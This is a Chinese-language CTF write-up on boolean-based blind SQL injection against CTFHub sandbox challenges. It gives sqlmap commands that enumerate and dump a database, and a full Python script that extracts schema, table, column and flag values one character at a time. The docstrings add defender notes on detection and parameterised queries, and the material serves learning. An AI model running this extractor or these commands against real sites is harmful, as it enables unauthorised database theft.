小白一个,如有错误请指正!
一、布尔注入
盲注有三种解法:
1.sqlmap
2.python脚本
3.手注
这里我就用sqlmap和脚本(手注真的会累死人的有木有?)
解法一:sqlmap
我们只需要按步骤来就可以了
sqlmap -u http://challenge-00cfdd6ec4589579.sandbox.ctfhub.com:10800/?id=123 --dbs
sqlmap -u http://challenge-00cfdd6ec4589579.sandbox.ctfhub.com:10800/?id=123 -D sqli --tables
sqlmap -u http://challenge-00cfdd6ec4589579.sandbox.ctfhub.com:10800/?id=123 -D sqli -T flag --columns
sqlmap -u http://challenge-00cfdd6ec4589579.sandbox.ctfhub.com:10800/?id=123 -D sqli -T flag -C flag --dump
解法二:使用脚本
1.自己比较菜,写的脚本还有点小问题,只能刚好爆出flag
import requests
import time
def database_name():
    """Recover the current schema name one character at a time.

    Boolean-based blind probe: each request appends a condition to the
    module-level ``url`` and the answer is read from whether ``mark_false``
    or ``mark_true`` occurs in the response body.  The function reads the
    globals ``url``, ``mark_false``, ``mark_true`` and ``dict_name``, which
    are bound only inside the ``__main__`` block at the bottom of this file,
    so it cannot be imported and called from elsewhere as-is.

    Returns:
        The string assembled from every ``dict_name`` character that produced
        a ``mark_true`` response, or ``None`` when no length probe ever
        returned ``mark_false`` (the ``for`` loop then ends without ``return``).

    Defender note: each guess is its own HTTP GET, so one run sends up to six
    length probes plus 26 requests per name position, all carrying
    ``length(database())`` or ``substr(database(),`` in the query string --
    an easy pattern to alert on in web-server or WAF logs.  A parameterised
    query removes the injection point altogether.
    """
    count = 0
    database_name = ''
    for i in range(1, 7):
        # "Is the name longer than i?"  count is incremented once per probe,
        # so when the first false answer arrives it equals the current i and
        # is used as the number of positions to probe.
        url_data_length = url + f'1 and length(database())>{i}'
        res = requests.get(url_data_length)
        count = count + 1
        if mark_false in res.text:
            # Try every dict_name character at positions 1..count.  There is
            # no break after a hit, so the full alphabet is always sent for
            # every position.
            for k in range(1, count+1):
                for j in dict_name:
                    url_data_name = url + f'1 and substr(database(),{k},1)=\'{j}\''
                    # print(url_data_name)
                    res = requests.get(url_data_name)
                    if mark_true in res.text:
                        database_name = database_name + j
            print('数据库名:' + database_name)
            return database_name
            break  # unreachable: the return above already leaves the function
def database_tables(database_name):
    """Guess up to two table names of ``database_name`` via information_schema.

    For ``table_number`` 0 and 1 the payload selects a single row with
    ``limit {table_number},1`` and tests positions ``k`` in ``range(0, 5)``
    against every character of ``dict_name``; a ``mark_true`` response
    appends that character to ``table_name``.  Only names that received at
    least one hit are printed and collected.  Reads the module globals
    ``url``, ``mark_true`` and ``dict_name`` set under ``__main__``.

    Args:
        database_name: schema name interpolated, unescaped, into the payload.

    Returns:
        list[str]: the assembled (possibly partial) table names, in order.

    Defender note: every request here contains ``information_schema.tables``
    in the query string, which is a reliable signature of schema enumeration.
    """
    tables_name = []
    for table_number in range(0, 2):
        table_name = ''
        for k in range(0, 5):
            for word in dict_name:
                url_table = url + f'1 and substr((select table_name from information_schema.tables where table_schema= \'{database_name}\' limit {table_number},1),{k},1)=\'{word}\''
                # print(payload_3)
                res = requests.get(url_table)
                if mark_true in res.text:
                    table_name = table_name + word
        # An empty string means no position produced a hit for this row.
        if table_name != '':
            print('表名:' + table_name)
            tables_name.append(table_name)
    return tables_name
def column_name(tables_name):
    """Guess up to two column names for each table in ``tables_name``.

    Same probe shape as ``database_tables`` but against
    ``information_schema.columns``, filtered by ``table_name`` only -- there
    is no ``table_schema`` condition in the payload.  The local variable
    ``column_name`` shadows this function's own name inside the body.
    Reads the module globals ``url``, ``mark_true`` and ``dict_name``.

    Args:
        tables_name: table names interpolated, unescaped, into the payload.

    Returns:
        list[list[str]]: ``[table_name, column_name]`` pairs for every column
        guess that received at least one hit, in discovery order.

    Defender note: ``information_schema.columns`` in a request parameter is,
    like the tables probe above, a clear enumeration indicator.
    """
    columns_name = []
    for table_name in tables_name:
        # print(table_name)
        for column_number in range(0, 2):
            column_name = ''
            for k in range(0, 5):
                for word in dict_name:
                    url_column = url + f'1 and substr((select column_name from information_schema.columns where table_name= \'{table_name}\' limit {column_number},1),{k},1)=\'{word}\''
                    # print(payload_3)
                    res = requests.get(url_column)
                    if mark_true in res.text:
                        column_name = column_name + word
            if column_name != '':
                print(f'{table_name}表字段名:' + column_name)
                columns_name.append([table_name, column_name])
    return columns_name
def flag_data(columns_name):
    """Print the value stored in each ``[table, column]`` pair, character by character.

    For each pair the payload ``select {column} from {table}`` is probed at
    positions ``flag_number`` in ``range(0, 40)`` against every character of
    ``dict_flag``.  ``column_number`` is never referenced inside the payload,
    so the 40-position scan is issued three times per column, each pass
    appending to the same ``flag`` string (reset once per column).  Output
    goes to ``print`` only; there is no ``return`` statement, so the caller
    receives ``None``.  Reads the module globals ``url``, ``mark_true`` and
    ``dict_flag``.

    Args:
        columns_name: ``[table_name, column_name]`` pairs as produced by
            ``column_name``; both values are interpolated unescaped.

    Defender note: this stage generates up to 3 * 40 * len(dict_flag) GETs
    per column, every one with ``substr((select`` in the query string --
    the request volume alone is anomalous for a single client.
    """
    # print(columns_name)
    for column_name in columns_name:
        flag = ''
        for column_number in range(0, 3):
            for flag_number in range(0, 40):
                for word in dict_flag:
                    # print(column_name[0], column_name[1])
                    url_flag = url + f'1 and substr((select {column_name[1]} from {column_name[0]} ),{flag_number},1)=\'{word}\''
                    # print(url_flag)
                    res = requests.get(url_flag)
                    if mark_true in res.text:
                        flag = flag + word
            print(column_name[1] + ':' + flag)
            # break
if __name__ == '__main__':
    # Runtime configuration is kept as module globals: every function above
    # reads url / mark_true / mark_false / dict_name / dict_flag directly
    # instead of taking them as parameters, so the file only works when run
    # as a script.
    start = time.time()
    url = 'http://challenge-4628615c0a2a2d50.sandbox.ctfhub.com:10800/?id='
    mark_true = 'query_success'   # substring that marks a "true" response body
    mark_false = 'query_error'    # substring that marks a "false" response body
    dict_name = 'qwertyuiopasdfghjklzxcvbnm'                # alphabet for identifiers
    dict_flag = 'qwertyuiopasdfghjklzxcvbnm{}1234567890'    # alphabet for the stored value
    # Rebinds the module name ``database_name`` from the function to its
    # string result, so the function is no longer reachable by that name.
    database_name = database_name()
    tables_name = database_tables(database_name)
    columns_name = column_name(tables_name)
    flag = flag_data(columns_name)  # flag_data has no return; this is always None
    end = time.time()
    print('运行时间为:', (end - start))
后续更新~